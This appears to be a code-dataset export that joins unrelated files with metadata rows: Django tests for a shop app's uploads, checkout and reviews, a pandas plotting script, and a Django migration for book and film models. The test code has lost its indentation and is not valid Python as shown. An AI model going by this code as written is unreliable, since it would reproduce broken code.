def test_upload_product_not_logged_in(self):
r = self.client.post(
reverse('shop:uploadfile', kwargs={'id': self.p1.id}),
{
'file': SimpleUploadedFile("file.txt", b"t",
content_type="text/txt"),
'name': 'n'
}
)
self.assertNotEqual(r.status_code, 200)
def test_upload_product_no_permission(self):
self.client.login(username=self.u2.username, password='passw0rd')
r = self.client.post(
reverse('shop:uploadfile', kwargs={'id': self.p1.id}),
{
'file': SimpleUploadedFile("file.txt", b"t",
content_type="text/txt"),
'name': 'n'
}
)
self.assertEqual(r.status_code, 403)
def test_upload_incomplete_request(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(
reverse('shop:uploadfile', kwargs={'id': self.p1.id}),
{}
)
self.assertEqual(r.status_code, 400)
def test_upload_name_too_big(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(
reverse('shop:uploadfile', kwargs={'id': self.p1.id}),
{
'file': SimpleUploadedFile("file.txt", b"t",
content_type="text/txt"),
'name': 'a'*201
}
)
self.assertEqual(r.status_code, 400)
def test_upload_no_name(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(reverse(
'shop:uploadfile', kwargs={'id': self.p1.id}),
{
'file': SimpleUploadedFile("file.txt", b"t",
content_type="text/txt"),
'name': ''
}
)
self.assertEqual(r.status_code, 400)
# Can't seem to fake file size... I'll have to rely on my intuition
"""def test_upload_file_too_large(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(
reverse('shop:uploadfile', kwargs={'id': self.p1.id}),
{
'file': InMemoryUploadedFile(
BytesIO(b"d"),
None,
'file.txt',
"text/txt",
10**10,
None,
None
),
'name': 's'
}
)
self.assertEqual(r.status_code, 400)"""
def test_upload_all_fine(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(
reverse('shop:uploadfile', kwargs={'id': self.p1.id}),
{
'file': SimpleUploadedFile("file.txt", b"t",
content_type="text/txt"),
'name': 's'
}
)
# TODO: Get this to work on py3.5
"""rjson = json.loads(str(r.content))
file = DigitalFile.objects.get(id=rjson['file'])
self.assertEqual(file.file.read(), b't')"""
self.assertEqual(r.status_code, 200)
class TestDeleteFile(TestCase):
def setUp(self):
self.u1 = User.objects.create_user('___u1', '', 'passw0rd')
ue1 = UserExtra(user=self.u1, verified=True)
ue1.save()
self.u1.save()
self.u2 = User.objects.create_user('___u2', '', 'passw0rd')
ue2 = UserExtra(user=self.u2, verified=True)
ue2.save()
self.u1.save()
self.p1 = Product(product_name='T', product_description='d', price=0,
physical=False, seller=self.u1)
self.p1.save()
self.file1 = DigitalFile(
file=SimpleUploadedFile("file.txt", b"t", content_type="text/txt"),
name='test',
product=self.p1
)
self.file1.save()
self.file2 = DigitalFile(
file=SimpleUploadedFile("file.txt", b"t", content_type="text/txt"),
name='test',
product=self.p1
)
self.file2.save()
def test_file_not_logged_in(self):
r = self.client.get(reverse('shop:deletefile',
kwargs={'id': self.file1.id}))
self.assertNotEqual(r.status_code, 200)
def test_file_no_permission(self):
self.client.login(username=self.u2.username, password='passw0rd')
r = self.client.get(reverse('shop:deletefile',
kwargs={'id': self.file1.id}))
self.assertEqual(r.status_code, 403)
def test_file_not_exists(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.get(reverse('shop:deletefile',
kwargs={'id': 2912787347128272}))
self.assertEqual(r.status_code, 404)
def test_file_all_fine(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.get(reverse('shop:deletefile',
kwargs={'id': self.file2.id}), follow=True)
self.assertEqual(r.status_code, 200)
class CheckoutTestCase(TestCase):
def setUp(self):
self.u1 = User.objects.create_user('____u1', '', 'passw0rd')
self.u1.save()
self.u2 = User.objects.create_user('____u2', '', 'passw0rd')
self.u2.save()
self.u3 = User.objects.create_user('____u3', '', 'passw0rd')
self.u3.save()
ue1 = UserExtra(user=self.u1, verified=True)
ue1.save()
ue2 = UserExtra(user=self.u2, verified=True)
ue2.save()
ue3 = UserExtra(user=self.u3, verified=True)
ue3.save()
w = Wallet(user=self.u1)
w.save()
w1 = Wallet(user=self.u2)
w2 = Wallet(user=self.u2, label='2')
w3 = Wallet(user=self.u3, label='3', redeemed=Decimal(-10000))
w4 = Wallet(user=self.u3, label='3', redeemed=Decimal(-500))
w1.save()
w2.save()
w3.save()
w4.save()
self.p1 = Product(
product_name='t',
seller=self.u1,
price=0,
physical=False,
stock=10
)
self.p1.save()
self.p2 = Product(
product_name='t',
seller=self.u1,
price=0,
physical=True,
stock=10,
worldwide_shipping=True,
free_shipping=True
)
self.p2.save()
self.expensiveproduct = Product(
product_name='t',
seller=self.u1,
price=2**32,
stock=10
)
self.expensiveproduct.save()
self.reasonableproduct = Product(
product_name='t',
seller=self.u1,
price=10,
stock=10
)
self.reasonableproduct.save()
self.outofstock = Product(
product_name='t',
seller=self.u1,
price=0,
stock=0
)
self.outofstock.save()
def test_checkout_not_logged_in(self):
r = self.client.get(reverse('shop:checkout'))
self.assertNotEqual(r.status_code, 200)
def test_checkout_cart_empty(self):
self.client.login(username=self.u1.username, password='passw0rd')
self.u1.userextra.clear_cart()
r = self.client.get(reverse('shop:checkout'))
self.assertNotEqual(r.status_code, 200)
def test_checkout_no_money(self):
self.client.login(username=self.u1.username, password='passw0rd')
self.u1.userextra.clear_cart()
self.u1.userextra.add_to_cart(self.expensiveproduct)
r = self.client.get(reverse('shop:checkout'))
self.assertNotEqual(r.status_code, 200)
def test_checkout_outofstock(self):
self.client.login(username=self.u1.username, password='passw0rd')
self.u1.userextra.clear_cart()
self.u1.userextra.add_to_cart(self.outofstock)
r = self.client.get(reverse('shop:checkout'))
self.assertNotEqual(r.status_code, 200)
def test_physical_one_wallet_free(self):
self.client.login(username=self.u1.username, password='passw0rd')
self.u1.userextra.clear_cart()
self.u1.userextra.add_to_cart(self.p2)
r = self.client.get(reverse('shop:checkout'))
self.assertTemplateUsed(r, 'shop/checkout1.html')
def test_physical_one_wallet_free_incomplete_data(self):
self.client.login(username=self.u1.username, password='passw0rd')
self.u1.userextra.clear_cart()
self.u1.userextra.add_to_cart(self.p2)
r = self.client.get(reverse('shop:checkout'))
self.assertTemplateUsed(r, 'shop/checkout1.html')
c = r.context['checkout']
r = self.client.post(reverse('shop:checkout'),
{'checkout': str(c.uuid)})
self.assertGreater(len(r.context['messages']), 0)
def test_physical_one_wallet_free_new_address(self):
self.client.login(username=self.u1.username, password='passw0rd')
self.u1.userextra.clear_cart()
self.u1.userextra.add_to_cart(self.p2)
r = self.client.get(reverse('shop:checkout'))
self.assertTemplateUsed(r, 'shop/checkout1.html')
c = r.context['checkout']
r = self.client.post(reverse('shop:checkout'), {
'checkout': str(c.uuid),
'name': "Mr. Testing",
'address1': "Somewhere, Norcross",
'state': "GA",
'country': "US",
'zip': "30092",
'use_custom_address': ""
})
self.assertTemplateUsed(r, 'shop/checkout3.html')
r = self.client.post(reverse('shop:checkout'),
{'checkout': str(c.uuid), 'confirm': ''})
self.assertEqual(r.status_code, 302)
def test_digital_one_wallet_free(self):
self.client.login(username=self.u1.username, password='passw0rd')
self.u1.userextra.clear_cart()
self.u1.userextra.add_to_cart(self.p1)
r = self.client.get(reverse('shop:checkout'))
self.assertTemplateUsed(r, 'shop/checkout3.html')
def test_digital_multiple_wallets_free(self):
self.client.login(username=self.u2.username, password='passw0rd')
self.u2.userextra.clear_cart()
self.u2.userextra.add_to_cart(self.p1)
r = self.client.get(reverse('shop:checkout'))
self.assertTemplateUsed(r, 'shop/checkout3.html')
def test_digital_multiple_wallets_enough_money(self):
self.client.login(username=self.u3.username, password='passw0rd')
self.u3.userextra.clear_cart()
self.u3.userextra.add_to_cart(self.reasonableproduct)
r = self.client.get(reverse('shop:checkout'))
self.assertTemplateUsed(r, 'shop/checkout2.html')
class ReviewTestCase(TestCase):
def setUp(self):
# These names are getting ridiculous
self.u1 = User.objects.create_user('______u1', '', 'passw0rd')
self.u1.save()
ue1 = UserExtra(user=self.u1, verified=True)
ue1.save()
c = Cart(user=self.u1)
c.save()
self.u2 = User.objects.create_user('______u2', '', 'passw0rd')
self.u2.save()
ue2 = UserExtra(user=self.u2, verified=True)
ue2.save()
c2 = Cart(user=self.u2)
c2.save()
self.p1 = Product(
product_name='t',
seller=self.u1,
price=0,
physical=False,
stock=10
)
self.p1.save()
self.p2 = Product(
product_name='t',
seller=self.u1,
price=0,
physical=False,
stock=10
)
self.p2.save()
self.pur = Purchase(by=self.u1)
self.pur.save()
pi = PurchaseItem(purchase=self.pur, price=Decimal(0), product=self.p1)
pi.save()
self.pur2 = Purchase(by=self.u2)
self.pur2.save()
pi2 = PurchaseItem(purchase=self.pur2, price=Decimal(0),
product=self.p1)
pi2.save()
def test_post_not_logged_in(self):
self.client.logout()
r = self.client.post(reverse('shop:viewproduct',
kwargs={'id': self.p1.id}), {
'title': 'post_not_logged_in',
'rating': 3,
'review': 'This shouldn\'t have been posted'
})
self.assertEqual(r.status_code, 302)
self.assertEqual(0,
self.p1.review_set.filter(title='post_not_logged_in')
.count())
def test_post_not_owned(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(reverse('shop:viewproduct',
kwargs={'id': self.p2.id}), {
'title': 'post_not_owned',
'rating': 3,
'review': 'This shouldn\'t have been posted'
})
self.assertEqual(0,
self.p2.review_set.filter(title='post_not_owned')
.count())
def test_post_owned_title_too_long(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(reverse('shop:viewproduct',
kwargs={'id': self.p1.id}), {
'title': 'a'*200,
'rating': 3,
'review': 'test_post_too_long'
})
self.assertEqual(0,
self.p1.review_set.filter(review='test_post_too_long')
.count())
def test_post_owned_rate_too_high(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(reverse('shop:viewproduct',
kwargs={'id': self.p1.id}), {
'title': 'test_post_rate_high',
'rating': 6,
'review': 'This shouldn\'t have been posted'
})
self.assertEqual(0,
self.p1.review_set.filter(title='test_post_rate_high')
.count())
def test_post_owned_rate_too_low(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(reverse('shop:viewproduct',
kwargs={'id': self.p1.id}), {
'title': 'test_post_rate_low',
'rating': 0,
'review': 'This shouldn\'t have been posted'
})
self.assertEqual(0,
self.p1.review_set.filter(title='test_post_rate_low')
.count())
def test_post_owned_rate_invalid(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(reverse('shop:viewproduct',
kwargs={'id': self.p1.id}), {
'title': 'test_post_rate_bad',
'rating': 'neat',
'review': 'This shouldn\'t have been posted'
})
self.assertEqual(0,
self.p1.review_set.filter(title='test_post_rate_bad')
.count())
def test_post_owned_all_fine(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.post(reverse('shop:viewproduct',
kwargs={'id': self.p1.id}), {
'title': 'test_post_fine',
'rating': 4,
'review': 'This should have been posted'
})
self.assertEqual(1,
self.p1.review_set.filter(title='test_post_fine')
.count())
def test_post_owned_edit(self):
self.client.login(username=self.u2.username, password='passw0rd')
self.client.post(reverse('shop:viewproduct',
kwargs={'id': self.p1.id}), {
'title': 't',
'rating': 4,
'review': 'This shouldn\'t have been posted'
})
self.client.post(reverse('shop:viewproduct',
kwargs={'id': self.p1.id}), {
'title': 'test_post_edit',
'rating': 4,
'review': 'This should have been posted'
})
self.assertEqual(0, self.p1.review_set.filter(title='t').count())
self.assertEqual(1,
self.p1.review_set.filter(title='test_post_edit')
.count())
class DeleteReviewTestCase(TestCase):
def setUp(self):
self.u1 = User.objects.create_user('_______u1', '', 'passw0rd')
self.u1.save()
ue1 = UserExtra(user=self.u1, verified=True)
ue1.save()
c = Cart(user=self.u1)
c.save()
self.u2 = User.objects.create_user('_______u2', '', 'passw0rd')
self.u2.save()
ue2 = UserExtra(user=self.u2, verified=True)
ue2.save()
c2 = Cart(user=self.u2)
c2.save()
self.p1 = Product(
product_name='t',
seller=self.u1,
price=0,
physical=False,
stock=10
)
self.p1.save()
self.p2 = Product(
product_name='t',
seller=self.u1,
price=0,
physical=False,
stock=10
)
self.p2.save()
self.r1 = Review(product=self.p1, user=self.u1, rating=4, title='r1',
review='review 1')
self.r1.save()
self.r2 = Review(product=self.p1, user=self.u2, rating=4, title='r2',
review='review 2')
self.r2.save()
self.r3 = Review(product=self.p1, user=self.u2, rating=4, title='r3',
review='review 3')
self.r3.save()
def test_delete_not_logged_in(self):
self.client.logout()
r = self.client.get(reverse('shop:deletereview', kwargs={
'id': self.p1.id,
'reviewid': self.r1.id
}))
self.assertEqual(r.status_code, 302)
self.assertEqual(Review.objects.filter(title='r1').count(), 1)
def test_delete_no_permission(self):
self.client.login(username=self.u2.username, password='passw0rd')
r = self.client.get(reverse('shop:deletereview', kwargs={
'id': self.p1.id,
'reviewid': self.r1.id
}))
self.assertEqual(r.status_code, 302)
self.assertEqual(Review.objects.filter(title='r1').count(), 1)
def test_delete_poster(self):
self.client.login(username=self.u2.username, password='passw0rd')
r = self.client.get(reverse('shop:deletereview', kwargs={
'id': self.p1.id,
'reviewid': self.r2.id
}))
self.assertEqual(r.status_code, 302)
self.assertEqual(Review.objects.filter(title='r2').count(), 0)
def test_delete_seller(self):
self.client.login(username=self.u1.username, password='passw0rd')
r = self.client.get(reverse('shop:deletereview', kwargs={
'id': self.p1.id,
'reviewid': self.r3.id
}))
self.assertEqual(r.status_code, 302)
self.assertEqual(Review.objects.filter(title='r3').count(), 0)
| 34.458333
| 79
| 0.548972
| 2,991
| 27,291
| 4.877967
| 0.092946
| 0.056203
| 0.027142
| 0.047498
| 0.837286
| 0.816313
| 0.785744
| 0.766347
| 0.739822
| 0.711446
| 0
| 0.033469
| 0.313547
| 27,291
| 791
| 80
| 34.501896
| 0.745329
| 0.005716
| 0
| 0.615506
| 0
| 0
| 0.124197
| 0
| 0
| 0
| 0
| 0.001264
| 0.106013
| 1
| 0.083861
| false
| 0.101266
| 0.014241
| 0
| 0.109177
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2eb7960ce3140ec7ac3164e707d922756ad1469b
| 1,279
|
py
|
Python
|
text_classifier/utils/analyze_data.py
|
felixdittrich92/Document_Scanner
|
64d482393aa76aa845a30cdf5c86c7705c780450
|
[
"MIT"
] | null | null | null |
text_classifier/utils/analyze_data.py
|
felixdittrich92/Document_Scanner
|
64d482393aa76aa845a30cdf5c86c7705c780450
|
[
"MIT"
] | null | null | null |
text_classifier/utils/analyze_data.py
|
felixdittrich92/Document_Scanner
|
64d482393aa76aa845a30cdf5c86c7705c780450
|
[
"MIT"
] | 1
|
2021-03-19T14:55:51.000Z
|
2021-03-19T14:55:51.000Z
|
"""Script to analyze the Dataframes
"""
import pandas as pd
import matplotlib.pyplot as plt
german_df = pd.read_parquet('/home/felix/Desktop/Document_Scanner/text_classifier/data/german.parquet')
english_df = pd.read_parquet('/home/felix/Desktop/Document_Scanner/text_classifier/data/english.parquet')
german_df.to_csv('/home/felix/Desktop/Document_Scanner/text_classifier/data/german.csv')
english_df.to_csv('/home/felix/Desktop/Document_Scanner/text_classifier/data/english.csv')
german_df = pd.read_csv('/home/felix/Desktop/Document_Scanner/text_classifier/data/german.csv')
english_df = pd.read_csv('/home/felix/Desktop/Document_Scanner/text_classifier/data/english.csv')
print("german data")
print(german_df.info)
print("english data")
print(english_df.info)
fig = german_df[["label", "text"]].groupby("label").count().plot(kind="bar", title="German Data").get_figure()
plt.xlabel("label")
plt.ylabel("text")
plt.tight_layout()
fig.savefig('/home/felix/Desktop/Document_Scanner/text_classifier/data/de_test.pdf')
fig = english_df[["label", "text"]].groupby("label").count().plot(kind="bar", title="English Data").get_figure()
plt.xlabel("label")
plt.ylabel("text")
plt.tight_layout()
fig.savefig('/home/felix/Desktop/Document_Scanner/text_classifier/data/en_test.pdf')
| 42.633333
| 112
| 0.784206
| 192
| 1,279
| 5.026042
| 0.244792
| 0.074611
| 0.132642
| 0.198964
| 0.765803
| 0.765803
| 0.765803
| 0.765803
| 0.765803
| 0.752332
| 0
| 0
| 0.04613
| 1,279
| 29
| 113
| 44.103448
| 0.790984
| 0.02502
| 0
| 0.272727
| 0
| 0
| 0.528226
| 0.449194
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
25823a8b6363471624240c48f9dff5e83c6d7d22
| 12,775
|
py
|
Python
|
items/migrations/0001_initial.py
|
LluisoCP/BooksAndFilms
|
a972091e920cb94313ab1f005a01bd72df538891
|
[
"MIT"
] | null | null | null |
items/migrations/0001_initial.py
|
LluisoCP/BooksAndFilms
|
a972091e920cb94313ab1f005a01bd72df538891
|
[
"MIT"
] | null | null | null |
items/migrations/0001_initial.py
|
LluisoCP/BooksAndFilms
|
a972091e920cb94313ab1f005a01bd72df538891
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.7 on 2019-09-17 12:09
from django.db import migrations, models
import django.db.models.deletion
import items.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=100)),
('last_name', models.CharField(max_length=100)),
('date_of_birth', models.DateField(blank=True, null=True, verbose_name='Born')),
('date_of_death', models.DateField(blank=True, null=True, verbose_name='Died')),
('genre', models.CharField(choices=[('', "Select the author's genre"), ('M', 'Male'), ('F', 'Female'), ('X', 'Other')], max_length=1)),
('short_bio', models.CharField(blank=True, default='No biography has been set for this author', max_length=255)),
('role', models.CharField(choices=[('Writter', 'Writter'), ('Director', 'Director')], max_length=8)),
],
),
migrations.CreateModel(
name='Book',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True)),
('title', models.CharField(max_length=32, unique=True)),
('description', models.CharField(blank=True, max_length=400)),
('phrase', models.CharField(blank=True, max_length=100)),
('release_year', models.SmallIntegerField(choices=[(1800, 1800), (1801, 1801), (1802, 1802), (1803, 1803), (1804, 1804), (1805, 1805), (1806, 1806), (1807, 1807), (1808, 1808), (1809, 1809), (1810, 1810), (1811, 1811), (1812, 1812), (1813, 1813), (1814, 1814), (1815, 1815), (1816, 1816), (1817, 1817), (1818, 1818), (1819, 1819), (1820, 1820), (1821, 1821), (1822, 1822), (1823, 1823), (1824, 1824), (1825, 1825), (1826, 1826), (1827, 1827), (1828, 1828), (1829, 1829), (1830, 1830), (1831, 1831), (1832, 1832), (1833, 1833), (1834, 1834), (1835, 1835), (1836, 1836), (1837, 1837), (1838, 1838), (1839, 1839), (1840, 1840), (1841, 1841), (1842, 1842), (1843, 1843), (1844, 1844), (1845, 1845), (1846, 1846), (1847, 1847), (1848, 1848), (1849, 1849), (1850, 1850), (1851, 1851), (1852, 1852), (1853, 1853), (1854, 1854), (1855, 1855), (1856, 1856), (1857, 1857), (1858, 1858), (1859, 1859), (1860, 1860), (1861, 1861), (1862, 1862), (1863, 1863), (1864, 1864), (1865, 1865), (1866, 1866), (1867, 1867), (1868, 1868), (1869, 1869), (1870, 1870), (1871, 1871), (1872, 1872), (1873, 1873), (1874, 1874), (1875, 1875), (1876, 1876), (1877, 1877), (1878, 1878), (1879, 1879), (1880, 1880), (1881, 1881), (1882, 1882), (1883, 1883), (1884, 1884), (1885, 1885), (1886, 1886), (1887, 1887), (1888, 1888), (1889, 1889), (1890, 1890), (1891, 1891), (1892, 1892), (1893, 1893), (1894, 1894), (1895, 1895), (1896, 1896), (1897, 1897), (1898, 1898), (1899, 1899), (1900, 1900), (1901, 1901), (1902, 1902), (1903, 1903), (1904, 1904), (1905, 1905), (1906, 1906), (1907, 1907), (1908, 1908), (1909, 1909), (1910, 1910), (1911, 1911), (1912, 1912), (1913, 1913), (1914, 1914), (1915, 1915), (1916, 1916), (1917, 1917), (1918, 1918), (1919, 1919), (1920, 1920), (1921, 1921), (1922, 1922), (1923, 1923), (1924, 1924), (1925, 1925), (1926, 1926), (1927, 1927), (1928, 1928), (1929, 1929), (1930, 1930), (1931, 1931), (1932, 1932), (1933, 1933), (1934, 1934), (1935, 1935), (1936, 1936), (1937, 1937), (1938, 1938), (1939, 1939), (1940, 1940), (1941, 1941), (1942, 1942), (1943, 1943), (1944, 1944), (1945, 1945), (1946, 1946), (1947, 1947), (1948, 1948), (1949, 1949), (1950, 1950), (1951, 1951), (1952, 1952), (1953, 1953), (1954, 1954), (1955, 1955), (1956, 1956), (1957, 1957), (1958, 1958), (1959, 1959), (1960, 1960), (1961, 1961), (1962, 1962), (1963, 1963), (1964, 1964), (1965, 1965), (1966, 1966), (1967, 1967), (1968, 1968), (1969, 1969), (1970, 1970), (1971, 1971), (1972, 1972), (1973, 1973), (1974, 1974), (1975, 1975), (1976, 1976), (1977, 1977), (1978, 1978), (1979, 1979), (1980, 1980), (1981, 1981), (1982, 1982), (1983, 1983), (1984, 1984), (1985, 1985), (1986, 1986), (1987, 1987), (1988, 1988), (1989, 1989), (1990, 1990), (1991, 1991), (1992, 1992), (1993, 1993), (1994, 1994), (1995, 1995), (1996, 1996), (1997, 1997), (1998, 1998), (1999, 1999), (2000, 2000), (2001, 2001), (2002, 2002), (2003, 2003), (2004, 2004), (2005, 2005), (2006, 2006), (2007, 2007), (2008, 2008), (2009, 2009), (2010, 2010), (2011, 2011), (2012, 2012), (2013, 2013), (2014, 2014), (2015, 2015), (2016, 2016), (2017, 2017), (2018, 2018), (2019, 2019)], verbose_name='Year')),
('art', models.CharField(editable=False, max_length=32)),
('language', models.CharField(blank=True, choices=[('', 'Choose Languange'), ('EN', 'English'), ('FR', 'French'), ('ES', 'Spanish'), ('CA', 'Catalan'), ('IT', 'Italian'), ('PT', 'Portuguese'), ('GK', 'Greek'), ('GM', 'German'), ('AR', 'Arabic'), ('RU', 'Rusian'), ('JP', 'Japanese'), ('CH', 'Chinese'), ('TK', 'Turkish'), ('DN', 'Danish'), ('SW', 'Swedish'), ('NW', 'Norwegian')], max_length=2, verbose_name='Original Language')),
('image', models.ImageField(blank=True, null=True, upload_to=items.models.b_img_directory_path)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='items.Author')),
],
options={
'ordering': ['title'],
'abstract': False,
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user', models.CharField(max_length=64)),
('content', models.CharField(max_length=1000)),
('commented_at', models.DateTimeField(auto_now_add=True)),
('grade', models.SmallIntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)], default=5)),
('book', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comments', related_query_name='whose_comments', to='items.Book')),
],
options={
'ordering': ['-commented_at'],
},
),
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=31)),
('last_name', models.CharField(max_length=31)),
('organisation', models.CharField(max_length=31)),
('content', models.CharField(max_length=511)),
],
),
migrations.CreateModel(
name='Film',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateField(auto_now_add=True)),
('title', models.CharField(max_length=32, unique=True)),
('description', models.CharField(blank=True, max_length=400)),
('phrase', models.CharField(blank=True, max_length=100)),
('release_year', models.SmallIntegerField(choices=[(1800, 1800), (1801, 1801), (1802, 1802), (1803, 1803), (1804, 1804), (1805, 1805), (1806, 1806), (1807, 1807), (1808, 1808), (1809, 1809), (1810, 1810), (1811, 1811), (1812, 1812), (1813, 1813), (1814, 1814), (1815, 1815), (1816, 1816), (1817, 1817), (1818, 1818), (1819, 1819), (1820, 1820), (1821, 1821), (1822, 1822), (1823, 1823), (1824, 1824), (1825, 1825), (1826, 1826), (1827, 1827), (1828, 1828), (1829, 1829), (1830, 1830), (1831, 1831), (1832, 1832), (1833, 1833), (1834, 1834), (1835, 1835), (1836, 1836), (1837, 1837), (1838, 1838), (1839, 1839), (1840, 1840), (1841, 1841), (1842, 1842), (1843, 1843), (1844, 1844), (1845, 1845), (1846, 1846), (1847, 1847), (1848, 1848), (1849, 1849), (1850, 1850), (1851, 1851), (1852, 1852), (1853, 1853), (1854, 1854), (1855, 1855), (1856, 1856), (1857, 1857), (1858, 1858), (1859, 1859), (1860, 1860), (1861, 1861), (1862, 1862), (1863, 1863), (1864, 1864), (1865, 1865), (1866, 1866), (1867, 1867), (1868, 1868), (1869, 1869), (1870, 1870), (1871, 1871), (1872, 1872), (1873, 1873), (1874, 1874), (1875, 1875), (1876, 1876), (1877, 1877), (1878, 1878), (1879, 1879), (1880, 1880), (1881, 1881), (1882, 1882), (1883, 1883), (1884, 1884), (1885, 1885), (1886, 1886), (1887, 1887), (1888, 1888), (1889, 1889), (1890, 1890), (1891, 1891), (1892, 1892), (1893, 1893), (1894, 1894), (1895, 1895), (1896, 1896), (1897, 1897), (1898, 1898), (1899, 1899), (1900, 1900), (1901, 1901), (1902, 1902), (1903, 1903), (1904, 1904), (1905, 1905), (1906, 1906), (1907, 1907), (1908, 1908), (1909, 1909), (1910, 1910), (1911, 1911), (1912, 1912), (1913, 1913), (1914, 1914), (1915, 1915), (1916, 1916), (1917, 1917), (1918, 1918), (1919, 1919), (1920, 1920), (1921, 1921), (1922, 1922), (1923, 1923), (1924, 1924), (1925, 1925), (1926, 1926), (1927, 1927), (1928, 1928), (1929, 1929), (1930, 1930), (1931, 1931), (1932, 1932), (1933, 1933), (1934, 1934), (1935, 1935), (1936, 1936), (1937, 1937), (1938, 1938), (1939, 1939), (1940, 1940), (1941, 1941), (1942, 1942), (1943, 1943), (1944, 1944), (1945, 1945), (1946, 1946), (1947, 1947), (1948, 1948), (1949, 1949), (1950, 1950), (1951, 1951), (1952, 1952), (1953, 1953), (1954, 1954), (1955, 1955), (1956, 1956), (1957, 1957), (1958, 1958), (1959, 1959), (1960, 1960), (1961, 1961), (1962, 1962), (1963, 1963), (1964, 1964), (1965, 1965), (1966, 1966), (1967, 1967), (1968, 1968), (1969, 1969), (1970, 1970), (1971, 1971), (1972, 1972), (1973, 1973), (1974, 1974), (1975, 1975), (1976, 1976), (1977, 1977), (1978, 1978), (1979, 1979), (1980, 1980), (1981, 1981), (1982, 1982), (1983, 1983), (1984, 1984), (1985, 1985), (1986, 1986), (1987, 1987), (1988, 1988), (1989, 1989), (1990, 1990), (1991, 1991), (1992, 1992), (1993, 1993), (1994, 1994), (1995, 1995), (1996, 1996), (1997, 1997), (1998, 1998), (1999, 1999), (2000, 2000), (2001, 2001), (2002, 2002), (2003, 2003), (2004, 2004), (2005, 2005), (2006, 2006), (2007, 2007), (2008, 2008), (2009, 2009), (2010, 2010), (2011, 2011), (2012, 2012), (2013, 2013), (2014, 2014), (2015, 2015), (2016, 2016), (2017, 2017), (2018, 2018), (2019, 2019)], verbose_name='Year')),
('art', models.CharField(editable=False, max_length=32)),
('language', models.CharField(blank=True, choices=[('', 'Choose Languange'), ('EN', 'English'), ('FR', 'French'), ('ES', 'Spanish'), ('CA', 'Catalan'), ('IT', 'Italian'), ('PT', 'Portuguese'), ('GK', 'Greek'), ('GM', 'German'), ('AR', 'Arabic'), ('RU', 'Rusian'), ('JP', 'Japanese'), ('CH', 'Chinese'), ('TK', 'Turkish'), ('DN', 'Danish'), ('SW', 'Swedish'), ('NW', 'Norwegian')], max_length=2, verbose_name='Original Language')),
('image', models.ImageField(blank=True, null=True, upload_to=items.models.f_img_directory_path)),
('director', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='items.Author')),
],
options={
'ordering': ['title'],
'abstract': False,
},
),
migrations.CreateModel(
name='Genre',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='Enter a genre', max_length=32, unique=True)),
],
),
migrations.AddField(
model_name='film',
name='genres',
field=models.ManyToManyField(help_text='Select the genres for this artpiece', related_name='films_related', related_query_name='whose_films', to='items.Genre'),
),
migrations.AddField(
model_name='comment',
name='film',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comments', related_query_name='whose_comments', to='items.Film'),
),
migrations.AddField(
model_name='book',
name='genres',
field=models.ManyToManyField(help_text='Select the genres for this artpiece', related_name='books_related', related_query_name='whose_books', to='items.Genre'),
),
]
| 112.061404
| 3,170
| 0.56955
| 1,577
| 12,775
| 4.54851
| 0.252378
| 0.046006
| 0.025094
| 0.033459
| 0.859752
| 0.836749
| 0.826432
| 0.826432
| 0.814443
| 0.814443
| 0
| 0.352815
| 0.199061
| 12,775
| 113
| 3,171
| 113.053097
| 0.348221
| 0.003523
| 0
| 0.556604
| 1
| 0
| 0.089959
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028302
| 0
| 0.066038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
